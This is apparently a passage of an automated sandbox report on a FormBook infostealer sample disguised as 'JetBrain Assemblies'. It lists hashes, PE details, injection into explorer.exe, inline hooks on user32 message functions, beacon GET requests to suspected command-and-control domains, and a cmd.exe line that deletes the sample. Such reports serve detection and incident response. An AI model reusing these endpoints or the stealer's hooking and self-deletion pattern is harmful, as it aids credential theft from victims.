Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.439544969133212
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	GiG35Rwmz6.exe
File size:	1116672
MD5:	b0901d0a6b90e6b371ba80e2c31ade52
SHA1:	2f175d971e4d6f4938083a78de9be10eb6ba0e05
SHA256:	08da4e7de40f2eec9cd1670e3db354d49d3101fd9ace7aaa5f99b235d2ce46ff
SHA512:	531e2494e065f083cfb8584365675ea5e85e7eac4668553423c50180be69fd7306667490300ed49ea86a95c6e4d6058e01e7feb594e68d3f416ad61ed3f55b8e
SSDEEP:	12288:kjuGIZRZkzHu3vmulMV40KJMp13ddUiJtYeYqHOqxiAwXSYhYQi32qNmTEdofxrh:kkGzihU31NddnYqueVK+cFWJGytwf
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...IG.`..............P.................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	f0e1e0b2b2ccb2cc

Static PE Info

General
Entrypoint:	0x4e099e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60C14749 [Wed Jun 9 22:57:13 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe094c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe2000	0x31a38	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x114000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xde9a4	0xdea00	False	0.778952528425	data	7.56086895782	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xe2000	0x31a38	0x31c00	False	0.442878454774	data	6.16912000975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x114000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xe22b0	0x99e7	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0xebc98	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0xfc4c0	0x94a8	data
RT_ICON	0x105968	0x5488	data
RT_ICON	0x10adf0	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432
RT_ICON	0x10f018	0x25a8	data
RT_ICON	0x1115c0	0x10a8	data
RT_ICON	0x112668	0x988	data
RT_ICON	0x112ff0	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x113458	0x84	data
RT_VERSION	0x1134dc	0x370	data
RT_MANIFEST	0x11384c	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2003 - 2021
Assembly Version	7.0.5.0
InternalName	IDispatch.exe
FileVersion	7.0.5.0
CompanyName	Jet Brain Inc.
LegalTrademarks
Comments
ProductName	JetBrain Assemblies
ProductVersion	7.0.5.0
FileDescription	JetBrain Assemblies
OriginalFilename	IDispatch.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/10/21-17:55:37.097047	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49763	154.214.84.117	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 17:55:15.886754036 CEST	49755	80	192.168.2.4	104.161.84.111
Jun 10, 2021 17:55:16.073743105 CEST	80	49755	104.161.84.111	192.168.2.4
Jun 10, 2021 17:55:16.073890924 CEST	49755	80	192.168.2.4	104.161.84.111
Jun 10, 2021 17:55:16.074119091 CEST	49755	80	192.168.2.4	104.161.84.111
Jun 10, 2021 17:55:16.261087894 CEST	80	49755	104.161.84.111	192.168.2.4
Jun 10, 2021 17:55:16.261115074 CEST	80	49755	104.161.84.111	192.168.2.4
Jun 10, 2021 17:55:16.261142969 CEST	80	49755	104.161.84.111	192.168.2.4
Jun 10, 2021 17:55:16.261260986 CEST	49755	80	192.168.2.4	104.161.84.111
Jun 10, 2021 17:55:16.261311054 CEST	49755	80	192.168.2.4	104.161.84.111
Jun 10, 2021 17:55:16.448402882 CEST	80	49755	104.161.84.111	192.168.2.4
Jun 10, 2021 17:55:36.540930986 CEST	49763	80	192.168.2.4	154.214.84.117
Jun 10, 2021 17:55:36.817631960 CEST	80	49763	154.214.84.117	192.168.2.4
Jun 10, 2021 17:55:36.817737103 CEST	49763	80	192.168.2.4	154.214.84.117
Jun 10, 2021 17:55:36.817979097 CEST	49763	80	192.168.2.4	154.214.84.117
Jun 10, 2021 17:55:37.096980095 CEST	80	49763	154.214.84.117	192.168.2.4
Jun 10, 2021 17:55:37.097047091 CEST	80	49763	154.214.84.117	192.168.2.4
Jun 10, 2021 17:55:37.097073078 CEST	80	49763	154.214.84.117	192.168.2.4
Jun 10, 2021 17:55:37.098098040 CEST	49763	80	192.168.2.4	154.214.84.117
Jun 10, 2021 17:55:37.098166943 CEST	49763	80	192.168.2.4	154.214.84.117
Jun 10, 2021 17:55:37.374846935 CEST	80	49763	154.214.84.117	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 17:54:03.897207022 CEST	53	64646	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:04.128212929 CEST	65298	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:04.133364916 CEST	59123	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:04.187016964 CEST	53	65298	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:04.192693949 CEST	53	59123	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:04.962551117 CEST	54531	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:05.032048941 CEST	53	54531	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:06.427086115 CEST	49714	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:06.478573084 CEST	53	49714	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:07.461468935 CEST	58028	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:07.524126053 CEST	53	58028	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:07.610402107 CEST	53097	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:07.663794994 CEST	53	53097	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:08.878528118 CEST	49257	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:08.933176041 CEST	53	49257	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:09.834079027 CEST	62389	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:09.884396076 CEST	53	62389	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:10.768091917 CEST	49910	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:10.821561098 CEST	53	49910	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:11.886607885 CEST	55854	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:11.947751999 CEST	53	55854	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:13.187076092 CEST	64549	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:13.237911940 CEST	53	64549	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:14.133040905 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:14.185241938 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:15.645942926 CEST	52991	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:15.695879936 CEST	53	52991	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:17.012578964 CEST	53700	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:17.070967913 CEST	53	53700	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:18.915184021 CEST	51726	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:18.965190887 CEST	53	51726	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:19.847906113 CEST	56794	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:19.903249025 CEST	53	56794	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:20.752156973 CEST	56534	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:20.803582907 CEST	53	56534	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:21.871786118 CEST	56627	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:21.921684027 CEST	53	56627	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:22.799137115 CEST	56621	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:22.849612951 CEST	53	56621	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:23.725646019 CEST	63116	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:23.777753115 CEST	53	63116	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:24.663191080 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:24.713352919 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 10, 2021 17:54:38.403340101 CEST	64801	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:54:38.463588953 CEST	53	64801	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:06.856198072 CEST	61721	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:07.005012989 CEST	53	61721	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:08.867978096 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:09.092139959 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:10.048212051 CEST	61522	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:10.111740112 CEST	53	61522	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:11.008630991 CEST	52337	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:11.062864065 CEST	53	52337	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:12.465064049 CEST	55046	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:12.526832104 CEST	53	55046	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:13.595782042 CEST	49612	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:13.658582926 CEST	53	49612	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:13.945862055 CEST	49285	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:14.016227007 CEST	53	49285	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:14.475907087 CEST	50601	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:14.539922953 CEST	53	50601	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:15.807821035 CEST	60875	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:15.880664110 CEST	53	60875	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:15.952099085 CEST	56448	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:16.019619942 CEST	53	56448	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:17.335041046 CEST	59172	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:17.398087025 CEST	53	59172	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:17.510993004 CEST	62420	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:17.574400902 CEST	53	62420	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:18.148736000 CEST	60579	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:18.209038019 CEST	53	60579	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:36.476860046 CEST	50183	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:36.539633989 CEST	53	50183	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:48.654230118 CEST	61531	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:48.721448898 CEST	53	61531	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:50.053525925 CEST	49228	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:50.122462988 CEST	53	49228	8.8.8.8	192.168.2.4
Jun 10, 2021 17:55:57.294620991 CEST	59794	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:55:57.357387066 CEST	53	59794	8.8.8.8	192.168.2.4
Jun 10, 2021 17:56:17.508779049 CEST	55916	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:56:17.573081970 CEST	53	55916	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 10, 2021 17:55:15.807821035 CEST	192.168.2.4	8.8.8.8	0x47e2	Standard query (0)	www.intentguild.com	A (IP address)	IN (0x0001)
Jun 10, 2021 17:55:36.476860046 CEST	192.168.2.4	8.8.8.8	0x7713	Standard query (0)	www.didyouswipe.com	A (IP address)	IN (0x0001)
Jun 10, 2021 17:55:57.294620991 CEST	192.168.2.4	8.8.8.8	0xba0	Standard query (0)	www.uebfaushb.com	A (IP address)	IN (0x0001)
Jun 10, 2021 17:56:17.508779049 CEST	192.168.2.4	8.8.8.8	0xcbfb	Standard query (0)	www.hometheaterplanning.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 10, 2021 17:55:15.880664110 CEST	8.8.8.8	192.168.2.4	0x47e2	No error (0)	www.intentguild.com		104.161.84.111	A (IP address)	IN (0x0001)
Jun 10, 2021 17:55:36.539633989 CEST	8.8.8.8	192.168.2.4	0x7713	No error (0)	www.didyouswipe.com		154.214.84.117	A (IP address)	IN (0x0001)
Jun 10, 2021 17:55:57.357387066 CEST	8.8.8.8	192.168.2.4	0xba0	Name error (3)	www.uebfaushb.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.intentguild.com

www.didyouswipe.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49755	104.161.84.111	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 17:55:16.074119091 CEST	1907	OUT	GET /n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRU HTTP/1.1 Host: www.intentguild.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 17:55:16.261115074 CEST	1909	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 10 Jun 2021 15:55:40 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49763	154.214.84.117	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 17:55:36.817979097 CEST	5396	OUT	GET /n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R0 HTTP/1.1 Host: www.didyouswipe.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 17:55:37.097047091 CEST	5396	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 10 Jun 2021 15:55:37 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE7
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE7
GetMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE7
GetMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE7

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: GiG35Rwmz6.exe PID: 6564 Parent PID: 5780

General

Start time:	17:54:10
Start date:	10/06/2021
Path:	C:\Users\user\Desktop\GiG35Rwmz6.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\GiG35Rwmz6.exe'
Imagebase:	0x3c0000
File size:	1116672 bytes
MD5 hash:	B0901D0A6B90E6B371BA80E2C31ADE52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: GiG35Rwmz6.exe PID: 6784 Parent PID: 6564

General

Start time:	17:54:15
Start date:	10/06/2021
Path:	C:\Users\user\Desktop\GiG35Rwmz6.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\GiG35Rwmz6.exe
Imagebase:	0x430000
File size:	1116672 bytes
MD5 hash:	B0901D0A6B90E6B371BA80E2C31ADE52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 6784

General

Start time:	17:54:18
Start date:	10/06/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: help.exe PID: 6044 Parent PID: 3424

General

Start time:	17:54:39
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\help.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\help.exe
Imagebase:	0x50000
File size:	10240 bytes
MD5 hash:	09A715036F14D3632AD03B52D1DA6BFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4564 Parent PID: 6044

General

Start time:	17:54:43
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\GiG35Rwmz6.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5872 Parent PID: 4564

General

Start time:	17:54:44
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
